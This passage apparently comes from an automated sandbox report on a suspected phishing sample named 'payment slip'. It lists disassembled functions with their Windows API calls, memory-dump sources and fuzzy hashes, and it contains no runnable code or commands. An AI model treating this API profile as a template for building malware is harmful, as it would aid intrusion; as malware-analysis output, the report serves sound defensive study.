                                        • Instruction Fuzzy Hash: 2A41E472A006049FDB24DF78C981AADB7F6EF89314F154569EA15EB352DB31AD01CB80
                                        Function 0004912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00049141
                                        • ScreenToClient.USER32(00000000,?), ref: 0004915E
                                        • GetAsyncKeyState.USER32(00000001), ref: 00049183
                                        • GetAsyncKeyState.USER32(00000002), ref: 0004919D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: AsyncState$ClientCursorScreen
                                        • String ID:
                                        • API String ID: 4210589936-0
                                        • Opcode ID: aa681181faeccf4c4b398145dbf7014e50549dcaa670c1d9fd50f225015a9c76
                                        • Instruction ID: 2a0de4980b91f9966b95d07a71defdbbc539fa17d2fc65c4383eabb26749ffd4
                                        • Opcode Fuzzy Hash: aa681181faeccf4c4b398145dbf7014e50549dcaa670c1d9fd50f225015a9c76
                                        • Instruction Fuzzy Hash: 3741547190851AFBDF15AF68C848BEEB7B4FF05320F204329E469A72E5C7346950CB55
                                        Function 000A3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetInputState.USER32 ref: 000A38CB
                                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 000A3922
                                        • TranslateMessage.USER32(?), ref: 000A394B
                                        • DispatchMessageW.USER32(?), ref: 000A3955
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000A3966
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                        • String ID:
                                        • API String ID: 2256411358-0
                                        • Opcode ID: 92f2932fc2d75a8a87fba7611ebbd7c55c1b9ba5c198474d81bc96b8ea902458
                                        • Instruction ID: 7d5ed7428707f3956824106689c40f10c0da8732824460de69c449ad79d3f374
                                        • Opcode Fuzzy Hash: 92f2932fc2d75a8a87fba7611ebbd7c55c1b9ba5c198474d81bc96b8ea902458
                                        • Instruction Fuzzy Hash: F7319E70904342AEFB75CBA4D848FB737E8AB07304F04456EF4A6865E0E7F89A85CB11
                                        Function 000ACF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 000ACF38
                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 000ACF6F
                                        • GetLastError.KERNEL32(?,00000000,?,?,?,000AC21E,00000000), ref: 000ACFB4
                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,000AC21E,00000000), ref: 000ACFC8
                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,000AC21E,00000000), ref: 000ACFF2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                        • String ID:
                                        • API String ID: 3191363074-0
                                        • Opcode ID: 21396523c111884afadb8d64339fb5f690a2e7e597fba03f494268ff50cd9821
                                        • Instruction ID: 2879c64e82f0e4e1a220bf197012da72afc058d9727206169a91b6b402afbd62
                                        • Opcode Fuzzy Hash: 21396523c111884afadb8d64339fb5f690a2e7e597fba03f494268ff50cd9821
                                        • Instruction Fuzzy Hash: 9C3169B1A04205AFFB20DFE5C884EABBBF9EB15350B11443EF50AD2111DB30AE41DBA0
                                        Function 00091901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00091915
                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 000919C1
                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 000919C9
                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 000919DA
                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 000919E2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessagePostSleep$RectWindow
                                        • String ID:
                                        • API String ID: 3382505437-0
                                        • Opcode ID: 1d650847a08c5d7d90abdd6d7c2ab61fd7c2ecd22bdb713c91aba44caf9ab38d
                                        • Instruction ID: 7df250e95047360e7a4141d0f38a99e56ce4f24971e6139532908b3118872a86
                                        • Opcode Fuzzy Hash: 1d650847a08c5d7d90abdd6d7c2ab61fd7c2ecd22bdb713c91aba44caf9ab38d
                                        • Instruction Fuzzy Hash: 7031BF71A0021AEFEF10CFA8CD99EDE3BB5EB05315F104229F925A72D1C7709944DB90
                                        Function 000C5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 000C5745
                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 000C579D
                                        • _wcslen.LIBCMT ref: 000C57AF
                                        • _wcslen.LIBCMT ref: 000C57BA
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 000C5816
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$_wcslen
                                        • String ID:
                                        • API String ID: 763830540-0
                                        • Opcode ID: cb15dff041c471d74227072374fd56f152fc35135770a84b74756b5b96d7861c
                                        • Instruction ID: 9b18677795a20835dc1fb050598198edf5b8e1d67fb11151c0c1d4ac0c69937f
                                        • Opcode Fuzzy Hash: cb15dff041c471d74227072374fd56f152fc35135770a84b74756b5b96d7861c
                                        • Instruction Fuzzy Hash: AC21A5359046189ADB209F60DC85FEE77BCFF04326F10825AE919EA181D770AAC5CF50
                                        Function 000B0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindow.USER32(00000000), ref: 000B0951
                                        • GetForegroundWindow.USER32 ref: 000B0968
                                        • GetDC.USER32(00000000), ref: 000B09A4
                                        • GetPixel.GDI32(00000000,?,00000003), ref: 000B09B0
                                        • ReleaseDC.USER32(00000000,00000003), ref: 000B09E8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$ForegroundPixelRelease
                                        • String ID:
                                        • API String ID: 4156661090-0
                                        • Opcode ID: fc4f8305ba3d7f2dafa8040372f3fdcbb8bab36bf65186407b2fea636b5bd669
                                        • Instruction ID: da7c7aa746daf687b1b0a0a47875d91ce33538217e9213c06134dc2dab66edae
                                        • Opcode Fuzzy Hash: fc4f8305ba3d7f2dafa8040372f3fdcbb8bab36bf65186407b2fea636b5bd669
                                        • Instruction Fuzzy Hash: DC218E35600204AFE714EF65C988EEEBBE9EF49740F048068E84AE7762CB34AC04CB50
                                        Function 0006CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 0006CDC6
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0006CDE9
                                          • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0006CE0F
                                        • _free.LIBCMT ref: 0006CE22
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0006CE31
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: b0d7846289686fdc78b31436ef16b12d4afbe1772f399c04d4d5975a923b0597
                                        • Instruction ID: 67447c03cff0402dd761176dc95f327bb7a83c965d49644fbc945f2587af2601
                                        • Opcode Fuzzy Hash: b0d7846289686fdc78b31436ef16b12d4afbe1772f399c04d4d5975a923b0597
                                        • Instruction Fuzzy Hash: 8A018472A026557F332117B6AC88D7F79BEDFC6BA13190129FD49C7201EA6A8E0191F0
                                        Function 00049639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                        Download Yara Rule
                                        APIs
                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00049693
                                        • SelectObject.GDI32(?,00000000), ref: 000496A2
                                        • BeginPath.GDI32(?), ref: 000496B9
                                        • SelectObject.GDI32(?,00000000), ref: 000496E2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ObjectSelect$BeginCreatePath
                                        • String ID:
                                        • API String ID: 3225163088-0
                                        • Opcode ID: d1a7c995cdfff8e943ee188c2380a5ba27dff0bda453fa35dafd300d94e2b35f
                                        • Instruction ID: e16a095929775a27fdaccd210baab0ac4a4d435109c5ffdea00e793ae67c57ed
                                        • Opcode Fuzzy Hash: d1a7c995cdfff8e943ee188c2380a5ba27dff0bda453fa35dafd300d94e2b35f
                                        • Instruction Fuzzy Hash: 8A219570802305FFEB119F65EC08BAA3BA4BB55319F110235F894965B0D3B898D1CF98
                                        Function 00095711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: 4410af872f52d8041adfaa6bb68bc273e4007a4508afbff9a865e48397a2a1a7
                                        • Instruction ID: 59045a8c0af6f50605717675dcf73ee52064bf3a39f55bce1d81e4f8c1830622
                                        • Opcode Fuzzy Hash: 4410af872f52d8041adfaa6bb68bc273e4007a4508afbff9a865e48397a2a1a7
                                        • Instruction Fuzzy Hash: CF01D671245605BA9A195652BE92FFFA39D9B20396B004024FE049E242F7B0EF14A3A1
                                        Function 00062DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,0005F2DE,00063863,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6), ref: 00062DFD
                                        • _free.LIBCMT ref: 00062E32
                                        • _free.LIBCMT ref: 00062E59
                                        • SetLastError.KERNEL32(00000000,00031129), ref: 00062E66
                                        • SetLastError.KERNEL32(00000000,00031129), ref: 00062E6F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: 6ccd3c7c14d3853c0a883e1bb5b0a454987bc60c4b685fc02a58ba8d9dce15d3
                                        • Instruction ID: ea909cefce737d64908a6a13c55818d3e6d81e9b5755d353d147c489ac022432
                                        • Opcode Fuzzy Hash: 6ccd3c7c14d3853c0a883e1bb5b0a454987bc60c4b685fc02a58ba8d9dce15d3
                                        • Instruction Fuzzy Hash: 3D012836645E0167E72267747C46DAF269FEBD23B1B250038F425A32D3EF7A8C014170
                                        Function 0009000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?,?,0009035E), ref: 0009002B
                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090046
                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090054
                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?), ref: 00090064
                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090070
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                        • String ID:
                                        • API String ID: 3897988419-0
                                        • Opcode ID: 9831d8709aaa77137ec124fcd0ab1c35d52a8c679527b966efb261fb432bfc34
                                        • Instruction ID: fd80ad919b9ee97255d77c4cb983b8d86fca87c96ad1d2ce2071c6857d4a19b0
                                        • Opcode Fuzzy Hash: 9831d8709aaa77137ec124fcd0ab1c35d52a8c679527b966efb261fb432bfc34
                                        • Instruction Fuzzy Hash: B4018F72600205BFEF108F68DC04FAE7AEDEB84751F144124F909D2210DB76DD44ABA0
                                        Function 0009E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0009E997
                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 0009E9A5
                                        • Sleep.KERNEL32(00000000), ref: 0009E9AD
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0009E9B7
                                        • Sleep.KERNEL32 ref: 0009E9F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                        • String ID:
                                        • API String ID: 2833360925-0
                                        • Opcode ID: 055f393a9abbec517a94ce8582e68a2a06fb648bec2c22745b9813252fc543b9
                                        • Instruction ID: c2710bfbecb035797f76f9bce006e39e145eef5088fe881c377b2b908f2c9f10
                                        • Opcode Fuzzy Hash: 055f393a9abbec517a94ce8582e68a2a06fb648bec2c22745b9813252fc543b9
                                        • Instruction Fuzzy Hash: 8A015731C01669DBEF40EBE5DC59AEDBB78FB09700F050956E902B2241CB3899509BA1
                                        Function 000910F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00091114
                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091120
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 0009112F
                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091136
                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0009114D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                        • String ID:
                                        • API String ID: 842720411-0
                                        • Opcode ID: cc945112351372f665fb661deb96386264e48712c829480c3702112bf45a6b67
                                        • Instruction ID: 2afe05695e78fd98d3b13492c723fee12919a15d39385e2cb964171c8ecddfbb
                                        • Opcode Fuzzy Hash: cc945112351372f665fb661deb96386264e48712c829480c3702112bf45a6b67
                                        • Instruction Fuzzy Hash: 4A013C75200205BFEB114FA5DC4DEAA3FAEEF8A3A0B244419FA49D7360DB35DD019B60
                                        Function 00090FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00090FCA
                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00090FD6
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00090FE5
                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00090FEC
                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00091002
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                        • String ID:
                                        • API String ID: 44706859-0
                                        • Opcode ID: 1989f2fbfb3d237e17a80981b64d7d6774081057b9be68582bb429ae3871c614
                                        • Instruction ID: 9715cb5ae17d22662098d59513afed6d8777d2b58240e27d2f96fbe790ae82dd
                                        • Opcode Fuzzy Hash: 1989f2fbfb3d237e17a80981b64d7d6774081057b9be68582bb429ae3871c614
                                        • Instruction Fuzzy Hash: DCF04935200302ABEB214FA5EC49F963BADFF8A762F244414FE49C6251CA75DC50CA60
                                        Function 00091014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0009102A
                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00091036
                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091045
                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0009104C
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091062
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                        • String ID:
                                        • API String ID: 44706859-0
                                        • Opcode ID: d8e76a93a995ae9ee80786b060eb03362b273ecd270780062b3f2aaa6e3cb095
                                        • Instruction ID: a9b36616ba3d63a1ab6571c1687a4c181b5b75a3211bad356a382dd964123cb5
                                        • Opcode Fuzzy Hash: d8e76a93a995ae9ee80786b060eb03362b273ecd270780062b3f2aaa6e3cb095
                                        • Instruction Fuzzy Hash: 1EF06D35200302EBFB215FA5EC49F963BADFF8A7A1F240414FE49C7250CA75D9508A60
                                        Function 000A030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0324
                                        • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0331
                                        • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A033E
                                        • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A034B
                                        • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0358
                                        • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0365
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
